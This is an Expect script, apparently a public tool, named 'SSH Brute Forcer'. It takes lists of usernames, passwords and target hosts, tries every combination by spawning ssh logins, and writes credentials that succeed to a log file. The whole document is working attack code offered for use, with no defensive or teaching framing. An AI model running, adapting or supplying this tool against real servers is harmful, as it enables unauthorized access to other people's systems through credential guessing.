#!/usr/bin/expect -f
# sshbfr.exp
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# SSH Brute Forcer

set usrfile [lindex $argv 0]
set pwdfile [lindex $argv 1]
set trgfile [lindex $argv 2]
set timeout [lindex $argv 3]
set logfile [lindex $argv 4]

if {[llength $argv] != 5}          {
     puts stdout "SSH Brute Forcer"
     puts stdout "Usage: $argv0 <user.list> <pass.list> <target.list> <timeout> <log.file>"
     exit                          }

set sshlog    [open $logfile a]

set bruteusr  [open $usrfile r]
set usernames [read $bruteusr ]

set brutepwd  [open $pwdfile r]
set passwords [read $brutepwd ]

set brutetrg  [open $trgfile r]
set targets   [read $brutetrg ]

foreach usr $usernames {
foreach pwd $passwords {
foreach trg $targets   {

     spawn ssh $usr@$trg

expect "$trg"      {
     send "$pwd\n"
                   }

expect "Last"                          {
     puts $sshlog "$usr:$pwd -> $trg\n"
     close $sshlog
                                       }

set pid [exp_pid]
exec kill -9 $pid

                       }
                       }
                       }